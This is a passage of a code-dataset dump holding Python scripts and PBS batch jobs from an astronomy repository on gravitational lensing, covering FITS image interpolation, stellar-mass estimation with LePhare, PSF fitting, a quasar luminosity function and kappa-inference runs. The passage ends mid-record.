"41306bca0ec63f8df4c77de5241715d1dedac992", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 596, "license_type": "no_license", "max_line_length": 126, "num_lines": 17, "path": "/python/image_utilities/zoom.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Interpolates a .fits image. Used here in order to sample an IRAC PSF to the pixel scale of the Tphot registration catalogue.\n\nimport numpy as np\nimport scipy\nfrom astropy.io import fits\nfrom scipy import ndimage\norigimg = fits.open('ker_i_ch1.fits')\norigdata = origimg[0].data\norigarray = np.array(origdata)\nzoomarray = scipy.ndimage.interpolation.zoom(origarray,0.9)\nzoomdata = fits.PrimaryHDU(zoomarray)\nzoomdata.writeto('ker_i_ch1_zoom0.9_.fits')\norigimg.close()\n\n# after this, do in IRAF:\n# imcopy ker_i_ch1_zoom0.9_.fits[6:104,6:104] ker_i_ch1_zoom0.9.fits\n# imdel ker_i_ch1_zoom0.9_.fits\n" }, { "alpha_fraction": 0.5442214012145996, "alphanum_fraction": 0.5751492381095886, "avg_line_length": 33.12963104248047, "blob_id": "660347c06384fea66e688d29c4613a8ad5777861", "content_id": "3698e99d698004af58063a93d45f83f1722e5c47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1843, "license_type": "no_license", "max_line_length": 169, "num_lines": 54, "path": "/python/image_utilities/HSClistforcutouts.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given a catalogue of RA and DEC, produces the input lists for DAS Cutout\n# run as python HSClistforcutouts.py /Volumes/LaCieSubaru/Gaia/DelchambreHSC5arcsecunique.cat\n\nimport os\nimport sys\nimport numpy as np\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\ncat = str(sys.argv[1])\ns = cat.split('/')[:-1]\npath = ''\nfor i in range(len(s)):\n path = path + s[i] + '/'\n\ncoord = np.loadtxt(cat,unpack=True)\nhead = '#? rerun filter ra dec sw sh # column descriptor\\n'\nrerun = 's18a_wide'\nfilters = ['HSC-G','HSC-R','HSC-I','HSC-Z','HSC-Y']\nsw = '7.5asec'\nsh = '7.5asec'\ndescriptor = '#'\n\nlen1 = np.shape(coord[0])[0] * len(filters) / 1000\nlen2 = np.shape(coord[0])[0] * len(filters) % 1000\nif len2 > 0: len1 +=1\nlen3 = np.shape(coord[0])[0] * len(filters) / len1\nlen4 = np.shape(coord[0])[0] * len(filters) % len1\nlen4 = len3 + len4\n\nfout = []\nfor i in range(len1):\n fout.append(path + cat.split('/')[-1][:-4] + '_cutout' + str(i) +'.cat')\n os.system(\"rm -f %s\" % fout[i])\n\nstrcoord = []\nfor i in range(np.shape(coord[0])[0]):\n x = SkyCoord(np.float(coord[0][i]), np.float(coord[1][i]), unit='deg')\n strcoord.append('{0} {1}'.format(x.ra.to_string(unit=u.hourangle, sep=':', precision=2, pad=True), x.dec.to_string(sep=':', precision=2, alwayssign=True, pad=True)))\n\n\npos = 0\nfor i in range(len1):\n f = open(fout[i],'a')\n f.write(head)\n if i == 0:\n for j in range(len4):\n f.write(rerun + ' ' + filters[pos % len(filters)] + ' ' + strcoord[pos / len(filters)] + ' ' + sw + ' ' + sh + ' ' + descriptor + '\\n')\n pos += 1\n if i != 0:\n for j in range(len3):\n f.write(rerun + ' ' + filters[pos % len(filters)] + ' ' + strcoord[pos / len(filters)] + ' ' + sw + ' ' + sh + ' ' + descriptor + '\\n')\n pos += 1\n f.close()\n" }, { "alpha_fraction": 0.5616679191589355, "alphanum_fraction": 0.6121577620506287, "avg_line_length": 52.797298431396484, "blob_id": "d3f0657d273e33553cbe3023fe4daf1cebd7c726", "content_id": "5821bcd35c93de8705eb231c64a12dbe7d4027a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3981, "license_type": "no_license", "max_line_length": 273, "num_lines": 74, "path": "/python/catalogue_utilities/MstarMilleniumSLAC_WFI2033_griK.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code computes stellar masses with LePhare for the galaxies in the Millennium Simulation, using a set of griK filters. It does this for the photometric redshift estimated in a previous run with photozMillenium_WFI2033.py, and for the \"true\" catalogue redshift as well.\n# Run on SLAC batch as python /scratch/cerusu/MstarMilleniumSLAC_WFI2033.py /scratch/cerusu/GGL_los_8_7_7_3_3_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griK_WFI2033.images_forlephare.txt\n# Needed to remove all headers because SLAC is running an old version of numpy\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nimport time\n\nstart_timefield = time.time()\n\nfile = str(sys.argv[1])\nif \"griK\" in file:\n fileinspecz = file[:-4] + \"_mstarspecz.txt\"\n fileinphotoz = file[:-4] + \"_mstarphotoz.txt\"\nfileout = file[:-4] + \"_mstar.txt\"\n\nid = 0\nu = 1\nu_err = 2\ng = 3\ng_err = 4\nr = 5\nr_err = 6\ni = 7\ni_err = 8\nz = 9\nz_err = 10\nJ = 11\nJ_err = 12\nH = 13\nH_err = 14\nK = 15\nK_err = 16\n\nif \"griK\" in file:\n specz = 17\n photoz = 18\n\nprint file\ndata = np.loadtxt(file,unpack=True)\nif \"griK\" in file:\n #str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t J \\t J_err \\t H \\t H_err \\t Ks \\t Ks_err \\t context \\t z-spec \\t string\"\n dataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data[specz]]\n #np.savetxt(fileinspecz,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 255 \\t %.3f')\n np.savetxt(fileinspecz,dataout,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 255 \\t %.3f')\n os.system(\"/scratch/cerusu/runlephare_phys_para_millenium.sh %s\" % fileinspecz) # run LePhare\n os.system(\"rm %s\" % fileinspecz[16:]) # to remove /scratch/cerusu/\n mstar_specz = np.loadtxt(fileinspecz + \".MAG_BC03_I09.lephareout\",usecols=[33,35],unpack=True)\n mstar_specz[0][mstar_specz[1] > 0] = mstar_specz[1][mstar_specz[1] > 0] # replace good MASS_BEST with good MASS_MED\n mstar_specz[0][mstar_specz[0] < 0] = 9 # replace bad MASS_BEST with 9\n os.system(\"rm %s\" % fileinspecz[16:] + \".MAG_BC03_I09.lephareout\")\n \n #str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t z \\t z_err \\t J \\t J_err \\t H \\t H_err \\t Ks \\t Ks_err \\t context \\t z-spec \\t string\"\n dataout = np.c_[data[id],data[u],data[u_err],data[g],data[g_err],data[r],data[r_err],data[i],data[i_err],data[z],data[z_err],data[J],data[J_err],data[H],data[H_err],data[K],data[K_err],data[photoz]]\n #np.savetxt(fileinphotoz,dataout,header=str,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 255 \\t %.2f')\n np.savetxt(fileinphotoz,dataout,fmt='%d \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t 255 \\t %.2f')\n os.system(\"/scratch/cerusu/runlephare_phys_para_millenium.sh %s\" % fileinphotoz)\n os.system(\"rm %s\" % fileinphotoz[16:])\n mstar_photoz = np.loadtxt(fileinphotoz + \".MAG_BC03_I09.lephareout\",usecols=[33,35],unpack=True)\n mstar_photoz[0][mstar_photoz[1] > 0] = mstar_photoz[1][mstar_photoz[1] > 0]\n mstar_photoz[0][mstar_photoz[0] < 0] = 9\n #str = \"ID \\t mstar_specz \\t mstar_photoz\"\n #np.savetxt(fileout,np.c_[data[id],mstar_specz[0],mstar_photoz[0]],header=str,fmt='%d \\t %.3f \\t %.3f')\n np.savetxt(fileout,np.c_[data[id],mstar_specz[0],mstar_photoz[0]],fmt='%d \\t %.3f \\t %.3f')\n os.system(\"rm %s\" % fileinphotoz[16:] + \".MAG_BC03_I09.lephareout\")\n\nos.system(\"rm %s\" % file[16:])\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n \nprint 'Done!'\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "c9b03b1c64488084db873d204f47b0c9eb998670", "content_id": "ef6fdac9c9effa7cc849bc6967de6f0b39c96126", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch6_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1\n#PBS -o Logb6.out\n#PBS -e Logb6.err\n#PBS -N 6\n#PBS -l mem=11gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_6_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "7df81bf4ee4bae8a71d919e5f6544d3e15752e4d", "content_id": "72b48151091138f99563c2be699de5f4b5711367", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch0_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb0.out\n#PBS -e Logb0.err\n#PBS -N 0\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.6582568883895874, "alphanum_fraction": 0.7912843823432922, "avg_line_length": 42.650001525878906, "blob_id": "03866717793c51688d500ff5095a61ec4fa64526", "content_id": "896dbac9c19567dbb835b0b0ebe150c2b2bae095", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 872, "license_type": "no_license", "max_line_length": 164, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim3new.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n##PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Log3.out\n#PBS -e Log3.err\n#PBS -N 3\n#PBS -l mem=30gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython inferkappa_unbiasedwithshear45and120FITSioincrem4.py J1206 -1.0 -1.0 nohandpicked fiducial notempty 5 23 measured med 120_gal 120_oneoverr 45_gal 45_oneoverr\npython inferkappa_unbiasedwithshear45and120FITSioincrem4.py J1206 -1.0 -1.0 nohandpicked fiducial notempty 5 23 measured med 120_gal 120_zoverr 45_gal 45_zoverr\npython inferkappa_unbiasedwithshear45and120FITSioincrem4.py J1206 -1.0 -1.0 nohandpicked fiducial notempty 5 24 measured med 120_gal 120_oneoverr 45_gal 45_oneoverr\npython inferkappa_unbiasedwithshear45and120FITSioincrem4.py J1206 -1.0 -1.0 nohandpicked fiducial notempty 5 24 measured med 120_gal 120_zoverr 45_gal 45_zoverr" }, { "alpha_fraction": 0.5571112632751465, "alphanum_fraction": 0.6105379462242126, "avg_line_length": 43.49180221557617, "blob_id": "da5e604032e20fa916ec0a34108b5eae0f30aefa", "content_id": "4160d455611d145695fcb63a9adb22fbdab00b07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2714, "license_type": "no_license", "max_line_length": 353, "num_lines": 61, "path": "/python/modeling_utilities/iterateChihFan_4psf.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# I first copy r_nolens_out_psf.fits into rnolenspsfcorrect.fits. Then I edit config_4psfrnolens to contain the correct input names, and this code to read the correct lines. After that I modify r_nolens_out_file.input to use rnolenspsfcorrect.fits as psf, read sigmar.fits, disalow analytical PSF parameters (except for sky) and run the code as follows:\n# run as python iterateChihFan_4psf.py r_nolens_out_file.input config_4psfrnolens rnolenspsfcorrect.fits\n\nimport sys\nimport os \nimport numpy as np\nfrom astropy.io import fits\n\niterations = 3\npixscale = 0.256\n\nfor i in range(iterations):\n with open(sys.argv[1], 'r') as fileinput:\n hostlens = fileinput.readlines()\n\n x1 = float(hostlens[43-1].split()[1]) # brightest\n y1 = float(hostlens[44-1].split()[1])\n f1 = float(hostlens[50-1].split()[1])\n x2 = float(hostlens[54-1].split()[1]) # 2nd brightest\n y2 = float(hostlens[55-1].split()[1])\n f2 = float(hostlens[61-1].split()[1])\n x3 = float(hostlens[65-1].split()[1]) # 3rd brightest\n y3 = float(hostlens[66-1].split()[1])\n f3 = float(hostlens[72-1].split()[1])\n x4 = float(hostlens[76-1].split()[1]) # 3rd brightest\n y4 = float(hostlens[77-1].split()[1])\n f4 = float(hostlens[83-1].split()[1])\n\n image = fits.open(str(sys.argv[1])[:-10]+\"psf.fits\")\n data = image[0].data * f2\n imagex = image\n imagex[0].data = data\n imagex.writeto(str(sys.argv[1])[:-10]+\"psf.fits\",clobber=True)\n\n with open(sys.argv[2], 'r') as fileconfig:\n config = fileconfig.readlines()\n\n config[6] = \"x1_in_arcsec \" + \"%.6f\" % (x1 * pixscale) + \"\\n\"\n config[7] = \"y1_in_arcsec \" + \"%.6f\" % (y1 * pixscale) + \"\\n\"\n config[8] = \"intensityof1(weak) \" + \"%.6e\" % f1 + \"\\n\"\n config[9] = \"x2_in_arcsec \" + \"%.6f\" % (x2 * pixscale) + \"\\n\"\n config[10] = \"y2_in_arcsec \" + \"%.6f\" % (y2 * pixscale) + \"\\n\"\n config[11] = \"intensityof2(strong) \" + \"%.6e\" % f2 + \"\\n\"\n config[12] = \"x3_in_arcsec \" + \"%.6f\" % (x3 * pixscale) + \"\\n\"\n config[13] = \"y3_in_arcsec \" + \"%.6f\" % (y3 * pixscale) + \"\\n\"\n config[14] = \"intensityof3(weak) \" + \"%.6e\" % f3 + \"\\n\"\n config[15] = \"x4_in_arcsec \" + \"%.6f\" % (x4 * pixscale) + \"\\n\"\n config[16] = \"y4_in_arcsec \" + \"%.6f\" % (y4 * pixscale) + \"\\n\"\n config[17] = \"intensityof4(weak) \" + \"%.6e\" % f4 + \"\\n\"\n\n with open(sys.argv[2], 'w') as fileconfig:\n fileconfig.writelines(config)\n\n fileinput.close()\n fileconfig.close()\n\n os.system(\"python PSF_correction_4psf.py %s %s\" %(str(sys.argv[2]),str(sys.argv[3])))\n os.system(\"hostlens %s\" % str(sys.argv[1]))\n\nfor i in range(3):\n os.system(\"hostlens %s\" % str(sys.argv[1])) # because hostlens needs a few executions in order to fully converge\n" }, { "alpha_fraction": 0.5504754781723022, "alphanum_fraction": 0.6386247277259827, "avg_line_length": 43.819671630859375, "blob_id": "2a87086df3f95ddebfe36effb68ffb34c596374f", "content_id": "fb63785e27cfbf10d73fe4ab28ffc43720a45b69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2734, "license_type": "no_license", "max_line_length": 427, "num_lines": 61, "path": "/python/QSOlumfunc/QSOlumfunc.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the QSO luminosity function from Croom et al. 2009 (SDSS + 2dF), as referenced in Oguri et al. 2012 (AJ,143:120) to compute a redshift probability for a quasar of given observed magnitude. I made sure that those papers use AB. However, I am not completely satisfied because the code also needs to use mag2mag.py with the AGN template from ............to convert from observed magnitude: M_i(z=0)=m_i-DM(z)-K'(z)\n# The luminosity function is given in terms of rest-frame g-band absolute magnitudes at z = 2 (i.e., M_g = M_g(z = 2)).\n\nimport numpy as np\nimport os\n\n# observed, magnification corrected QSO magnitudes:\nqso_g = 18.92\nqso_r = 18.80\nqso_i = 18.66\nqso_z = 18.53\nqso_y = 18.24\n\nKcorr = np.loadtxt(\"datafile4.txt\",unpack=True) # K-correction from Richards et al. 2006\nzlist = Kcorr[0] # the list of redshifts z = np.linspace(0,5.49,550)\n\nh=0.7 # Hubble\nalpha =-0.5\nbeta_h=3.33\nbeta_1=1.42\nPhi_star=1.45*(10**-6)*((h/0.7)**3) # Mpc^-3 mag-1, h=0.7\nM_g_star_zero=-22.18 + 5*np.log10(h/0.7)\nk_1=1.44\nk_2=-0.315\nM_g_star = lambda z : M_g_star_zero-2.5*(k_1*z+k_2*(z**2))\nPhi = lambda M_g,z: Phi_star/(10**(0.4*(1-beta_h)*(M_g-M_g_star(z)))+10**(0.4*(1-beta_1)*(M_g-M_g_star(z))))\n\nimport distances\nd = distances.Distance()\nDM = lambda z: d.distance_modulus(z)\n\nPhi_list = np.zeros(len(zlist))\nfor z in range(len(zlist)):\n if z != 0: # error in distance_modulus\n M_i_z0 = qso_i - DM(zlist[z]) + 2.5*(1+alpha)*np.log10(1+zlist[z]) # absolute magnitude at redshift zero assuming a quasar continuum (formula 1 in Richards et al. 2006, and m=M+DM+K)\n M_i_z = M_i_z0 - 2.5*(1+alpha)*np.log10(1+zlist[z])\n M_g = M_i_z + 0.255 - Kcorr[1][z] # for each redshift, find M_g(z=2) which corresponds to m_i and apply the K-correction computed for M_i(z=2)\n #mag2mag = float(os.popen(\"mag2mag.py -T agn -m1 %s -f1 i_ps1 -z1 %s -f2 i_SDSS -z2 0.00\" %(qso_i,zlist[z])).read())\n #M_g = mag2mag + 2.5*(1+alpha)*np.log10(1+zlist[z]) + 0.255 - Kcorr[1][z]\n Phi_list[z] = Phi(M_g,zlist[z])\n\n#Phi_list = np.zeros(len(zlist))\n#for z in range(len(zlist)):\n# Phi_list[z] = Phi(-28,zlist[z])\n\nnp.savetxt(\"QLF(z)_iobserved.cat\",np.c_[zlist,Phi_list])\n\nimport pylab as plt\nplt.clf()\nplt.xlim([0.4,3])\nPhi_list[40:300] = Phi_list[40:300]/np.sum(Phi_list[40:300])\nplt.plot(zlist[40:300],Phi_list[40:300])\nplt.show()\n\n\n\n#import os\n#\"mag2mag.py -T agn -m1 18.66 -f1 i_ps1 -z1 2.00 -f2 g_SDSS -z2 0.00\"\n#mag2mag=float(os.popen(\"mag2mag.py -T agn -m1 18.66 -f1 i_ps1 -z1 2.00 -f2 g_SDSS -z2 0.00\").read()) # redirect standard output to variable\n# Phi(M_g,z) = Phi_star/(10**(0.4*(1-beta_h)*(M_g-M_g_star(z)))+10**(0.4*(1-beta_1)*(M_g-M_g_star(z))))\n# M_g_star(z) = M_g_star_zero-2.5*(k_1*z+k_2*(z**2))\n" }, { "alpha_fraction": 0.6620000004768372, "alphanum_fraction": 0.7620000243186951, "avg_line_length": 24, "blob_id": "7acde4dffb0d9b4834cd13456c1d973d758ef403", "content_id": "5635146e43b75d85bb92f9ccbdff334053e31cc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 500, "license_type": "no_license", "max_line_length": 66, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim2.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log2s.out\n#PBS -e Log2s.err\n#PBS -N 2s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal oneoverr\npython inferkappasimbias.py WFI2033 5 120 23 meds gal oneoverr\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal oneoverr\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal oneoverr\n" }, { "alpha_fraction": 0.6278772354125977, "alphanum_fraction": 0.6930946111679077, "avg_line_length": 25.066667556762695, "blob_id": "b9a08b8a008d72a48b79bf8408637765d21e876f", "content_id": "35da81b00eec22167dffa102174581e573b14de6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 782, "license_type": "no_license", "max_line_length": 97, "num_lines": 30, "path": "/python/catalogue_utilities/Mstar-veldispcomparison.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Cone search\nimport numpy as np\nimport pylab as plt\n\n# section 3, Jabran Zahid et al. 2016\nlogsigmab = 2.072\nlogMb = 10.26\nalpha1 = 0.403\nalpha2 = 0.29\n\ndef log_sigma_Zahid(logMstar):\n log_sigma_Zahid = np.copy(logMstar)\n log_sigma_Zahid[logMstar <= logMb] = logsigmab + alpha1*(logMstar[logMstar <= logMb] - logMb)\n log_sigma_Zahid[logMstar > logMb] = logsigmab + alpha2*(logMstar[logMstar > logMb] - logMb)\n return log_sigma_Zahid\n\nlogMstar = np.linspace(9,12,100)\n\n# bottom of left column, page 5, Mason et al. 2015\np = 0.24\nq = 2.34\nlog_sigma_Mason = p * logMstar - 11 * p + q\n\n\nplt.plot(logMstar,log_sigma_Mason,label=\"Mason 2015\")\nplt.plot(logMstar,log_sigma_Zahid(logMstar),label=\"Zahid 2016\")\nplt.xlabel('log(Mstar)')\nplt.ylabel('log(sigma)')\nplt.legend()\nplt.show()\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "3520e0324854729b36ed3a144178a374d0f30037", "content_id": "2f42c65b6ba9c8c39fcee7bd0f4aa2dba7bbce7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch5_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1\n#PBS -o Logb5.out\n#PBS -e Logb5.err\n#PBS -N 5\n#PBS -l mem=11gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_5_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.5450419783592224, "alphanum_fraction": 0.5695611238479614, "avg_line_length": 70.66990661621094, "blob_id": "0bf786308d5891b2b6e19961329db753acf21c38", "content_id": 